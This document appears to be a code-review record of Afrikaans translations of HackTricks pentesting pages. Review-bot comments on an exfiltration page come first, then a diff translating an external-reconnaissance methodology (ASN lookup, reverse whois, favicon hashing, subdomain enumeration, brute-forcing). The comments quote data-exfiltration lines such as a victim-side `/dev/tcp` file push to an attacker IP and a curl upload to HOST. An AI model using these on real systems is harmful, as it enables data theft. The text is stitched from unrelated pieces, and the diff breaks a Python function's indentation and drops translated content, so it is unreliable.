-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
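Review bot: in the first hunk (`@@ -1,60 +1,150 @@`) the block starting `+# Exfiltration` / `+## Introduction` and ending `+By implementing these countermeasures...` is generic, untranslated filler that is not part of the page and should be dropped; it is inserted twice, once between `**Windows**` and the `certutil -encode payload.dll payload.b64` fence in the Base64 section and again between `**Windows**` and the `certutil -urlcache` fence in the HTTP section, so each `**Windows**` caption is separated from its code block and the file gains a second `# Exfiltration` H1 mid-document (the two copies even differ in their countermeasure wording). In the same hunk `## HTTP` is demoted to `+### HTTP`, which nests it under the Base64 section; keep `## HTTP`. The new title `+# Uitleiding` is also inconsistent with `Exfiltrasie`, the term the same patch uses further down; use `# Exfiltrasie` throughout.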
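Review bot: in the hunk `@@ -69,28 +159,26 @@` the paragraph `+'n HTTPS-bediener is 'n bediener wat gebruik maak van die HTTPS-protokol...` added under `### **HTTPS-bediener**` is generic explanatory text with no counterpart in the source and should be removed. Separately, the whitespace-only rewrite of `+curl -X POST http://HOST/upload -H -F 'files=@file.txt'` preserves a broken command: `-H` requires an argument, so `-F` is consumed as the header value and `'files=@file.txt'` is parsed as a second URL. Since this line is being touched anyway, change it (and the basic-auth variant) to `curl -X POST http://HOST/upload -F 'files=@file.txt'`.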
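Review bot: in the hunk `@@ -122,34 +210,164 @@` the Flask block loses its indentation (`+def root():` / `+print(request.get_json())` / `+return "OK"`, and likewise the body of `+if __name__ == "__main__":`), which turns valid Python into an IndentationError; restore the four-space indentation exactly as in the removed lines. The same hunk adds a `+```python` / `+import socket` block under `### FTP-bediener (python)` that is a raw TCP sender/receiver, not an FTP server, while the added prose tells the reader to call it with port 21; the `+npm install ftp` client snippet (connecting to `ftp.example.com` with `user: 'username', password: 'password'`) and the pure-ftp `#### Inleiding` ... `#### Gevolgtrekking` essay are likewise invented content that contradicts the surrounding `pyftpdlib`, `ftp-srv` and `pure-ftp` server commands. Drop all three so the section only documents the commands the page actually describes.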
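Review bot: in the hunk `@@ -191,34 +406,70 @@` the `-Windows` caption that introduced the `CMD-Wind> \\10.10.14.14\path\to\exe` / `net use z:` commands is replaced by `+# Exfiltrasie` followed by a generic essay on exfiltration methods and prevention; this leaves the Windows client commands without a label and adds another H1 in the middle of the file. Restore the caption (e.g. `Windows` or `Windows kliënt`, matching the `### **Windows** kliënt` heading used earlier in the patch) and drop the essay. The indentation stripped from the samba config (`+comment = Samba on Ubuntu`, `+path = /tmp/smb`, ...) is harmless to smbd but is an unrelated change that should not be part of a translation commit.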
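Review bot: in the hunk `@@ -226,54 +477,98 @@` the `## /dev/tcp` heading is removed and replaced with `+### Laai lêer af van slagoffer`, so the `/dev/tcp` technique loses its own section and becomes a subsection of `## NC`; restore `## /dev/tcp` with the two translated `###` subheadings under it. The added example `+cat < /dev/tcp/192.168.0.100/8080 > /tmp/secret_file.txt` and its explanation also invert the direction shown by the original commands (`nc -lvnp 80 > file #Inside attacker` and `cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim`): the page's technique is the victim pushing the file to the attacker's listener, not the attacker reading from a port on the victim. The English netcat tutorial with mangled placeholders (`nc -l -p > `, `nc < `) and the `#### 1. HTTP-aanvraag` ... `#### 4. Cloud-gebaseerde dienste` list under "Laai lêer op na slagoffer" are filler unrelated to the `nc -w5 -lvnp 80 < file_to_send.txt` / `exec 6< /dev/tcp/...` commands and should be removed.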
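Review bot: in the hunk `@@ -284,64 +579,177 @@` the VBScript language tutorial (`+VBScript (Visual Basic Scripting Edition) is a scripting language developed by Microsoft...` through `+### Conclusion`) inserted between `## VBScript` and `Attacker> python -m SimpleHTTPServer 80` is unrelated filler, left in English inside an Afrikaans translation, and should be removed; the section is about the `wget.vbs` downloader built by the `echo ... >> wget.vbs` lines that follow. On wording, `+Laai 'n lêer af met 'n PHP eenregtelik:` uses a word that does not exist in Afrikaans for "one-liner"; `'n PHP-opdrag van een reël` or keeping `one-liner` reads correctly.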
diff --git a/generic-methodologies-and-resources/external-recon-methodology/README.md b/generic-methodologies-and-resources/external-recon-methodology/README.md index 2768e4307..8edcefb3a 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -1,60 +1,57 @@ -# External Recon Methodology +# Eksterne Verkenning Metodologie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings te verdien tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} -## Assets discoveries +## Bate-ontdekkings -> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns. +> So jy is vertel dat alles wat aan 'n maatskappy behoort binne die omvang is, en jy wil uitvind wat hierdie maatskappy eintlik besit. -The goal of this phase is to obtain all the **companies owned by the main company** and then all the **assets** of these companies. To do so, we are going to: +Die doel van hierdie fase is om al die **maatskappye wat deur die hoofmaatskappy besit word** te verkry en dan al die **bates** van hierdie maatskappye. Om dit te doen, gaan ons: -1. Find the acquisitions of the main company, this will give us the companies inside the scope. -2. Find the ASN (if any) of each company, this will give us the IP ranges owned by each company -3. Use reverse whois lookups to search for other entries (organisation names, domains...) related to the first one (this can be done recursively) -4. Use other techniques like shodan `org`and `ssl`filters to search for other assets (the `ssl` trick can be done recursively). +1. Vind die verkrygings van die hoofmaatskappy, dit sal ons die maatskappye binne die omvang gee. +2. Vind die ASN (indien enige) van elke maatskappy, dit sal ons die IP-reeks besit deur elke maatskappy gee. +3. 
Gebruik omgekeerde whois-opsoek na ander inskrywings (organisasienames, domeine...) wat verband hou met die eerste een (dit kan rekursief gedoen word). +4. Gebruik ander tegnieke soos shodan `org`en `ssl`filters om na ander bates te soek (die `ssl`-truk kan rekursief gedoen word). -### **Acquisitions** +### **Verkrygings** -First of all, we need to know which **other companies are owned by the main company**.\ -One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.\ -Other option is to visit the **Wikipedia** page of the main company and search for **acquisitions**. +Eerstens moet ons weet watter **ander maatskappye deur die hoofmaatskappy besit word**.\ +Een opsie is om [https://www.crunchbase.com/](https://www.crunchbase.com) te besoek, **soek** vir die **hoofmaatskappy**, en **klik** op "**verkrygings**". Daar sal jy ander maatskappye sien wat deur die hoofmaatskappy verkry is.\ +'n Ander opsie is om die **Wikipedia**-bladsy van die hoofmaatskappy te besoek en te soek na **verkrygings**. -> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets. +> Ok, op hierdie punt behoort jy al die maatskappye binne die omvang te ken. Kom ons vind uit hoe om hul bates te vind. ### **ASNs** -An autonomous system number (**ASN**) is a **unique number** assigned to an **autonomous system** (AS) by the **Internet Assigned Numbers Authority (IANA)**.\ -An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators. 
- -It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs.\ -You can **search** by company **name**, by **IP** or by **domain** in [**https://bgp.he.net/**](https://bgp.he.net)**.**\ -**Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net) **(Africa),** [**Arin**](https://www.arin.net/about/welcome/region/)**(North America),** [**APNIC**](https://www.apnic.net) **(Asia),** [**LACNIC**](https://www.lacnic.net) **(Latin America),** [**RIPE NCC**](https://www.ripe.net) **(Europe). Anyway, probably all the** useful information **(IP ranges and Whois)** appears already in the first link. +'n Autonome stelselnommer (**ASN**) is 'n **unieke nommer** wat toegewys word aan 'n **autonome stelsel** (AS) deur die **Internet Assigned Numbers Authority (IANA)**.\ +'n **AS** bestaan uit **blokke** van **IP-adresse** wat 'n duidelik gedefinieerde beleid het vir toegang tot eksterne netwerke en deur 'n enkele organisasie geadministreer word, maar uit verskeie operateurs kan bestaan. +Dit is interessant om uit te vind of die **maatskappy enige ASN toegewys het** om sy **IP-reeks** te vind. 
Dit sal interessant wees om 'n **kwesbaarheidstoets** uit te voer teen al die **gasheer** binne die **omvang** en te soek na domeine binne hierdie IP's.\ +Jy kan **soek** op maatskappy **naam**, op **IP** of op **domein** in [**https://bgp.he.net/**](https://bgp.he.net)**.**\ +**Afhanklik van die streek van die maatskappy kan hierdie skakels nuttig wees om meer data in te samel:** [**AFRINIC**](https://www.afrinic.net) **(Afrika),** [**Arin**](https://www.arin.net/about/welcome/region/)**(Noord-Amerika),** [**APNIC**](https://www.apnic.net) **(Asië),** [**LACNIC**](https://www.lacnic.net) **(Latyns-Amerika),** [**RIPE NCC**](https://www.ripe.net) **(Europa). In elk geval verskyn waarskynlik alle** nuttige inligting **(IP-reeks en Whois)** reeds in die eerste skakel. ```bash #You can try "automate" this with amass, but it's not very recommended amass intel -org tesla amass intel -asn 8911,50313,394161 ``` - -Also, [**BBOT**](https://github.com/blacklanternsecurity/bbot)**'s** subdomain enumeration automatically aggregates and summarizes ASNs at the end of the scan. - +Verder, [**BBOT**](https://github.com/blacklanternsecurity/bbot) se subdomeinversameling aggregeer en som die ASNs outomaties op aan die einde van die skandering. ```bash bbot -t tesla.com -f subdomain-enum ... 
@@ -71,62 +68,59 @@ bbot -t tesla.com -f subdomain-enum [INFO] bbot.modules.asn: +----------+---------------------+--------------+----------------+----------------------------+-----------+ ``` +Jy kan die IP-reeks van 'n organisasie vind deur [http://asnlookup.com/](http://asnlookup.com) te gebruik (dit het 'n gratis API).\ +Jy kan die IP en ASN van 'n domein vind deur [http://ipv4info.com/](http://ipv4info.com) te gebruik. -You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com) (it has free API).\ -You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com). +### **Op soek na kwesbaarhede** -### **Looking for vulnerabilities** +Op hierdie punt weet ons **al die bates binne die omvang**, so as jy toegelaat word, kan jy 'n **kwesbaarheidsskander** (Nessus, OpenVAS) oor al die gasheerstelsels uitvoer.\ +Jy kan ook 'n paar [**poortskanderings**](../pentesting-network/#discovering-hosts-from-the-outside) **uitvoer of dienste soos** shodan **gebruik om oop poorte te vind en, afhangende van wat jy vind, moet jy in hierdie boek kyk hoe om verskeie moontlike dienste te pentest.\ +**Dit is ook die moeite werd om te vermeld dat jy ook 'n paar** standaard gebruikersnaam **en** wagwoorde **lyste kan voorberei en probeer om dienste te** bruteforce met [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). 
-At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\ -Also, you could launch some [**port scans**](../pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\ -**Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). +## Domeine -## Domains +> Ons ken al die maatskappye binne die omvang en hul bates, dit is tyd om die domeine binne die omvang te vind. -> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope. +*Let daarop dat jy in die volgende voorgestelde tegnieke ook subdomeine kan vind en daardie inligting nie onderskat moet word nie.* -_Please, note that in the following purposed techniques you can also find subdomains and that information shouldn't be underrated._ +Eerstens moet jy soek na die **hoofdomein**(e) van elke maatskappy. Byvoorbeeld, vir _Tesla Inc._ gaan dit _tesla.com_ wees. -First of all you should look for the **main domain**(s) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_. - -### **Reverse DNS** - -As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server (1.1.1.1, 8.8.8.8) +### **Omgekeerde DNS** +Nadat jy al die IP-reeks van die domeine gevind het, kan jy probeer om **omgekeerde DNS-opsoekings** op daardie **IP's uit te voer om meer domeine binne die omvang te vind**. 
Probeer om 'n DNS-bediener van die slagoffer of 'n bekende DNS-bediener (1.1.1.1, 8.8.8.8) te gebruik. ```bash dnsrecon -r -n #DNS reverse of all of the addresses dnsrecon -d facebook.com -r 157.240.221.35/24 #Using facebooks dns dnsrecon -r 157.240.221.35/24 -n 1.1.1.1 #Using cloudflares dns dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns ``` +Vir hierdie om te werk, moet die administrateur die PTR handmatig aktiveer.\ +Jy kan ook 'n aanlyn hulpmiddel gebruik vir hierdie inligting: [http://ptrarchive.com/](http://ptrarchive.com) -For this to work, the administrator has to enable manually the PTR.\ -You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com) +### **Omgekeerde Whois (lus)** -### **Reverse Whois (loop)** +Binne 'n **whois** kan jy baie interessante **inligting** vind soos **organisasienaam**, **adres**, **e-posse**, telefoonnommers... Maar wat nog interessanter is, is dat jy **meer bates wat verband hou met die maatskappy** kan vind as jy **omgekeerde whois-opsoekings deur enige van daardie velde** uitvoer (byvoorbeeld ander whois-registre waar dieselfde e-pos verskyn).\ +Jy kan aanlyn hulpmiddels soos die volgende gebruik: -Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** (for example other whois registries where the same email appears).\ -You can use online tools like: +* [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Gratis** +* [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Gratis** +* [https://www.reversewhois.io/](https://www.reversewhois.io) - **Gratis** +* [https://www.whoxy.com/](https://www.whoxy.com) - **Gratis** web, nie gratis API nie. 
+* [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - Nie gratis nie +* [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Nie gratis (slegs **100 gratis** soektogte) +* [https://www.domainiq.com/](https://www.domainiq.com) - Nie gratis nie -* [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Free** -* [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Free** -* [https://www.reversewhois.io/](https://www.reversewhois.io) - **Free** -* [https://www.whoxy.com/](https://www.whoxy.com) - **Free** web, not free API. -* [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - Not free -* [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Not Free (only **100 free** searches) -* [https://www.domainiq.com/](https://www.domainiq.com) - Not Free +Jy kan hierdie taak outomatiseer deur [**DomLink** ](https://github.com/vysecurity/DomLink)(vereis 'n whoxy API-sleutel) te gebruik.\ +Jy kan ook 'n paar outomatiese omgekeerde whois-ontdekkings doen met [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois` -You can automate this task using [**DomLink** ](https://github.com/vysecurity/DomLink)(requires a whoxy API key).\ -You can also perform some automatic reverse whois discovery with [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois` +**Let daarop dat jy hierdie tegniek kan gebruik om meer domeinname te ontdek elke keer as jy 'n nuwe domein vind.** -**Note that you can use this technique to discover more domain names every time you find a new domain.** +### **Opvolgers** -### **Trackers** +As jy dieselfde ID van dieselfde opvolger op 2 verskillende bladsye vind, kan jy aanneem dat **beide bladsye** deur dieselfde span **bestuur word**.\ +Byvoorbeeld, as jy dieselfde **Google Analytics ID** of dieselfde **Adsense ID** op verskeie 
bladsye sien. -If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.\ -For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages. - -There are some pages and tools that let you search by these trackers and more: +Daar is 'n paar bladsye en hulpmiddels wat jou in staat stel om daardeur te soek en meer: * [**Udon**](https://github.com/dhn/udon) * [**BuiltWith**](https://builtwith.com) 
@@ -136,106 +130,92 @@ There are some pages and tools that let you search by these trackers and more: ### **Favicon** -Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here’s how to use it: - +Het jy geweet dat ons verwante domeine en subdomeine aan ons teiken kan vind deur te soek na dieselfde favicon-ikoonhash? Dit is presies wat die [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) hulpmiddel, gemaak deur [@m4ll0k2](https://twitter.com/m4ll0k2), doen. Hier is hoe om dit te gebruik: ```bash cat my_targets.txt | xargs -I %% bash -c 'echo "http://%%/favicon.ico"' > targets.txt python3 favihash.py -f https://target/favicon.ico -t targets.txt -s ``` +![favihash - ontdek domeine met dieselfde favicon-ikoon-hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg) -![favihash - discover domains with the same favicon icon hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg) - -Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target. - -Moreover, you can also search technologies using the favicon hash as explained in [**this blog post**](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139). That means that if you know the **hash of the favicon of a vulnerable version of a web tech** you can search if in shodan and **find more vulnerable places**: +Eenvoudig gestel, favihash sal ons in staat stel om domeine te ontdek wat dieselfde favicon-ikoon-hash as ons teiken het. 
+Verder kan jy ook tegnologieë soek deur die favicon-hash te gebruik soos verduidelik in [**hierdie blogpos**](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139). Dit beteken dat as jy die **hash van die favicon van 'n kwesbare weergawe van 'n webtegnologie** ken, kan jy soek of dit in shodan is en **meer kwesbare plekke vind**: ```bash shodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}' ``` - -This is how you can **calculate the favicon hash** of a web: - +Dit is hoe jy die **favicon-hash kan bereken** van 'n webwerf: ```python import mmh3 import requests import codecs def fav_hash(url): - response = requests.get(url) - favicon = codecs.encode(response.content,"base64") - fhash = mmh3.hash(favicon) - print(f"{url} : {fhash}") - return fhash +response = requests.get(url) +favicon = codecs.encode(response.content,"base64") +fhash = mmh3.hash(favicon) +print(f"{url} : {fhash}") +return fhash ``` +### **Auteursreg / Unieke string** -### **Copyright / Uniq string** +Soek binne die webbladsye na **strings wat gedeel kan word oor verskillende webwerwe in dieselfde organisasie**. Die **auteursreg string** kan 'n goeie voorbeeld wees. Soek dan vir daardie string in **Google**, in ander **blaaierprogramme** of selfs in **Shodan**: `shodan search http.html:"Auteursreg string"` -Search inside the web pages **strings that could be shared across different webs in the same organisation**. The **copyright string** could be a good example. Then search for that string in **google**, in other **browsers** or even in **shodan**: `shodan search http.html:"Copyright string"` - -### **CRT Time** - -It's common to have a cron job such as +### **CRT-tyd** +Dit is algemeen om 'n cron-taak te hê soos ```bash # /etc/crontab 37 13 */10 * * certbot renew --post-hook "systemctl reload nginx" ``` +### **Passiewe Oorname** -to renew the all the domain certificates on the server. 
This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**.\ -Check out this [**writeup for more information**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/). +Dit is blykbaar algemeen vir mense om subdomeine toe te ken aan IP-adresse wat aan wolkverskaffers behoort en op 'n stadium daardie IP-adres te verloor, maar vergeet om die DNS-rekord te verwyder. Daarom sal die skep van 'n VM in 'n wolk (soos Digital Ocean) jou eintlik die beheer oor sommige subdomeine gee. -### **Passive Takeover** +[**Hierdie berig**](https://kmsec.uk/blog/passive-takeover/) verduidelik 'n storie daaroor en stel 'n skripsie voor wat 'n VM in DigitalOcean skep, die IPv4 van die nuwe masjien kry, en in Virustotal soek na subdomeinrekords wat daarna verwys. -Apparently is common for people to assign subdomains to IPs that belongs to cloud providers and at some point **lose that IP address but forget about removing the DNS record**. Therefore, just **spawning a VM** in a cloud (like Digital Ocean) you will be actually **taking over some subdomains(s)**. +### **Ander maniere** -[**This post**](https://kmsec.uk/blog/passive-takeover/) explains a store about it and propose a script that **spawns a VM in DigitalOcean**, **gets** the **IPv4** of the new machine, and **searches in Virustotal for subdomain records** pointing to it. - -### **Other ways** - -**Note that you can use this technique to discover more domain names every time you find a new domain.** +**Let daarop dat jy hierdie tegniek kan gebruik om meer domeinname te ontdek elke keer as jy 'n nuwe domein vind.** **Shodan** -As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate. 
+Aangesien jy reeds die naam van die organisasie wat die IP-ruimte besit, ken, kan jy daarna soek in Shodan deur die volgende te gebruik: `org:"Tesla, Inc."` Kyk na die gevonde gasheer vir nuwe onverwagte domeine in die TLS-sertifikaat. -You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"` or use a tool like [**sslsearch**](https://github.com/HarshVaragiya/sslsearch). +Jy kan toegang verkry tot die **TLS-sertifikaat** van die hoofwebblad, die **Organisasienaam** verkry en dan soek na daardie naam binne die **TLS-sertifikate** van al die webbladsye wat bekend is by **Shodan** met die filter: `ssl:"Tesla Motors"` of gebruik 'n hulpmiddel soos [**sslsearch**](https://github.com/HarshVaragiya/sslsearch). **Assetfinder** -[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing. +[**Assetfinder**](https://github.com/tomnomnom/assetfinder) is 'n hulpmiddel wat soek na **verwante domeine** van 'n hoofdomein en **subdomeine** daarvan, baie indrukwekkend. -### **Looking for vulnerabilities** +### **Soek na kwesbaarhede** -Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company. +Kyk vir 'n [domein-oorgawe](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Dalk gebruik 'n maatskappy 'n domein, maar het hulle die eienaarskap verloor. Registreer dit net (as dit goedkoop genoeg is) en laat die maatskappy weet. 
-If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\ -_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ +As jy enige **domein met 'n ander IP** as diegene wat jy reeds in die bate-ontdekking gevind het, vind, moet jy 'n **basiese kwesbaarheidsskandering** (met behulp van Nessus of OpenVAS) en 'n [**poortskenning**](../pentesting-network/#discovering-hosts-from-the-outside) met **nmap/masscan/shodan** uitvoer. Afhangende van watter dienste besig is, kan jy in **hierdie boek 'n paar truuks vind om hulle te "aanval"**.\ +Merk op dat die domein soms gehuisves word binne 'n IP wat nie deur die kliënt beheer word nie, so dit val buite die bestek, wees versigtig. \ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers vir hackers geskep is**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %} -## Subdomains +## Subdomeine -> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies. +> Ons ken al die maatskappye binne die bestek, al die bates van elke maatskappy en al die domeine wat verband hou met die maatskappye. 
-It's time to find all the possible subdomains of each found domain. +Dit is tyd om al die moontlike subdomeine van elke gevonde domein te vind. ### **DNS** -Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it). - +Laten ons probeer om **subdomeine** uit die **DNS**-rekords te kry. Ons moet ook probeer vir **Zone Transfer** (As dit kwesbaar is, moet jy dit rapporteer). ```bash dnsrecon -a -d tesla.com ``` - ### **OSINT** -The fastest way to obtain a lot of subdomains is search in external sources. The most used **tools** are the following ones (for better results configure the API keys): +Die vinnigste manier om 'n groot aantal subdomeine te verkry, is om in eksterne bronne te soek. Die mees gebruikte **hulpmiddels** is die volgende (stel die API-sleutels vir beter resultate): * [**BBOT**](https://github.com/blacklanternsecurity/bbot) - ```bash # subdomains bbot -t tesla.com -f subdomain-enum 
@@ -246,108 +226,80 @@ bbot -t tesla.com -f subdomain-enum -rf passive # subdomains + port scan + web screenshots bbot -t tesla.com -f subdomain-enum -m naabu gowitness -n my_scan -o . ``` - * [**Amass**](https://github.com/OWASP/Amass) - ```bash amass enum [-active] [-ip] -d tesla.com amass enum -d tesla.com | grep tesla.com # To just list subdomains ``` - * [**subfinder**](https://github.com/projectdiscovery/subfinder) - ```bash # Subfinder, use -silent to only have subdomains in the output ./subfinder-linux-amd64 -d tesla.com [-silent] ``` - * [**findomain**](https://github.com/Edu4rdSHL/findomain/) - ```bash # findomain, use -silent to only have subdomains in the output ./findomain-linux -t tesla.com [--quiet] ``` - -* [**OneForAll**](https://github.com/shmilylty/OneForAll/tree/master/docs/en-us) - +* [**OneForAll**](https://github.com/shmilylty/OneForAll/tree/master/docs/af-za) ```bash python3 oneforall.py --target tesla.com [--dns False] [--req False] [--brute False] run ``` - * [**assetfinder**](https://github.com/tomnomnom/assetfinder) - ```bash assetfinder --subs-only ``` - * [**Sudomy**](https://github.com/Screetsec/Sudomy) - ```bash # It requires that you create a sudomy.api file with API keys sudomy -d tesla.com ``` - * [**vita**](https://github.com/junnlikestea/vita) - ``` vita -d tesla.com ``` - * [**theHarvester**](https://github.com/laramies/theHarvester) - ```bash theHarvester -d tesla.com -b "anubis, baidu, bing, binaryedge, 